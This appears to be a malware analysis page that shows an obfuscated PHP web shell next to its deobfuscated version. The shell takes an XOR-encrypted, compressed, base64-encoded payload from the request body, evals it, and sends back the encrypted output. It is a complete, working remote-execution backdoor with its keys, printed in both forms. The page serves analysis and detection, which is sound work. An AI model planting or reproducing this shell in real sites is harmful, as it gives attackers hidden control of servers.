PHP Malware Analysis

Back to list

Tags

Encoding
base64_decode
base64_encode
Execution
eval

Deobfuscated code

<?php

$E = '#@basV#e64_deV#code($m[1V#])V#,$k))V#);$o=@ob_get_V#cV#ontenV#ts();@oV#V#b_end_clV';
$S = "create_function";
$l = 's("pV#hpV#://inputV#"V#),$m)==1)V# {@ob_staV#rt();@V#eV#val(@gzuncV#omV#press(@x(V';
$D = '$k="827ccV#b0e";V#$khV#="ea8V#a706c4V#cV#34";$kf="a1689V#1f84V#e7b";$p="hV#V#qUDnUDlYV#B';
$n = '{$j};}}returV#n $o;}if (V#V#@V#V#preV#g_match("/$kh(.+)$kV#f/",@filV#e_get_V#content';
$b = 'gWvvV#WN";functioV#n V#x($t,$k)V#V#{$c=stV#rV#len($k);$lV#=strlen($t);$V#oV#="";for';
$g = '#ean();$r=@bV#ase64_eV#nV#code(@x(@V#gzcV#omV#press($o),$V#k));print("$pV#$khV#$r$kf");}';
$U = '($V#i=0V#;$i<$l;){foV#V#r($j=0;($j<$V#cV#V#&&$i<$l);$jV#++,$i+V#V#+){$o.=$t{V#$iV#}^$k';
$t = "\$k=\"827ccb0e\";\$kh=\"ea8a706c4c34\";\$kf=\"a16891f84e7b\";\$p=\"hqUDnUDlYBgWvvWN\";function x(\$t,\$k){\$c=strlen(\$k);\$l=strlen(\$t);\$o=\"\";for(\$i=0;\$i<\$l;){for(\$j=0;(\$j<\$c&&\$i<\$l);\$j++,\$i++){\$o.=\$t{\$i}^\$k{\$j};}}return \$o;}if (@preg_match(\"/\$kh(.+)\$kf/\",@file_get_contents(\"php://input\"),\$m)==1) {@ob_start();@eval(@gzuncompress(@x(@base64_decode(\$m[1]),\$k)));\$o=@ob_get_contents();@ob_end_clean();\$r=@base64_encode(@x(@gzcompress(\$o),\$k));print(\"\$p\$kh\$r\$kf\");}";
$z = function () {
    $k = "827ccb0e";
    $kh = "ea8a706c4c34";
    $kf = "a16891f84e7b";
    $p = "hqUDnUDlYBgWvvWN";
    function x($t, $k)
    {
        $c = strlen($k);
        $l = strlen($t);
        $o = "";
        for ($i = 0; $i < $l;) {
            for ($j = 0; $j < $c && $i < $l; $j++, $i++) {
                $o .= $t[$i] ^ $k[$j];
            }
        }
        return $o;
    }
    if (@preg_match("/ea8a706c4c34(.+)a16891f84e7b/", @file_get_contents("php://input"), $m) == 1) {
        @ob_start();
        @eval(@gzuncompress(@x(@base64_decode($m[1]), $k)));
        $o = @ob_get_contents();
        @ob_end_clean();
        $r = @base64_encode(@x(@gzcompress($o), $k));
        print "{$p}{$kh}{$r}{$kf}";
    }
};
$z();

Original code

<?php
$E='#@basV#e64_deV#code($m[1V#])V#,$k))V#);$o=@ob_get_V#cV#ontenV#ts();@oV#V#b_end_clV';
$S=str_replace('LG','','LGcreaLGteLG_LGfuLGncLGtion');
$l='s("pV#hpV#://inputV#"V#),$m)==1)V# {@ob_staV#rt();@V#eV#val(@gzuncV#omV#press(@x(V';
$D='$k="827ccV#b0e";V#$khV#="ea8V#a706c4V#cV#34";$kf="a1689V#1f84V#e7b";$p="hV#V#qUDnUDlYV#B';
$n='{$j};}}returV#n $o;}if (V#V#@V#V#preV#g_match("/$kh(.+)$kV#f/",@filV#e_get_V#content';
$b='gWvvV#WN";functioV#n V#x($t,$k)V#V#{$c=stV#rV#len($k);$lV#=strlen($t);$V#oV#="";for';
$g='#ean();$r=@bV#ase64_eV#nV#code(@x(@V#gzcV#omV#press($o),$V#k));print("$pV#$khV#$r$kf");}';
$U='($V#i=0V#;$i<$l;){foV#V#r($j=0;($j<$V#cV#V#&&$i<$l);$jV#++,$i+V#V#+){$o.=$t{V#$iV#}^$k';
$t=str_replace('V#','',$D.$b.$U.$n.$l.$E.$g);
$z=$S('',$t);$z();
?>